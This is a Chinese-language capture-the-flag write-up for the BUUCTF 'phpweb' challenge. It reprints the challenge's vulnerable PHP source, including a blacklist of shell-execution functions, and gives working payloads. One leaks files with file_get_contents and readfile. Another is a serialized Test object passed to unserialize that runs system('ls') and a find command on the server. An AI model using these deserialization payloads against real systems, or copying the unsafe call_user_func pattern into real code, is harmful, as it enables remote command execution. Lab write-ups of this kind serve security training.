BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化
题目
Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone ‘UTC’ for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24
2021-06-25 09:41:34 am
一开始用BurpSuite抓包的时候,我还以为是SQL注入。结果好一段时间都做不出来。后来看了别人的WP发现根本就不是…
这里需要用的file_get_contents来读取index.php文件
所以payload:func=file_get_contents&p=index.php
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>
好吧,这是个反序列化的题目
其中要注意的是这里有两个func的变量,其中第一个func会被过滤一些信息,但是第二个不会!
if (!in_array($func,$disable_fun))
首先我们需要用system('ls')
来读取当前目录下有什么文件,但是第一个$func过滤了system
这个函数,却没有过滤unserialize
所以payload::func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:2:"ls";}
这样就可以读取当前目录下的文件了
所以,需要尝试搜索一下flag文件!
payload:func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:19:"find / -name *flag*";}
注意,这里运行很慢,因为他找这个flag相关的文件需要花很多时间。(一开始我还以为我写错了代码)
另外,关于读取flag还有另外一种写法:func=readfile&p=/tmp/flagoefiu4r93
理由是第一个func
没有过滤readfile
这个函数,所以可以直接读取!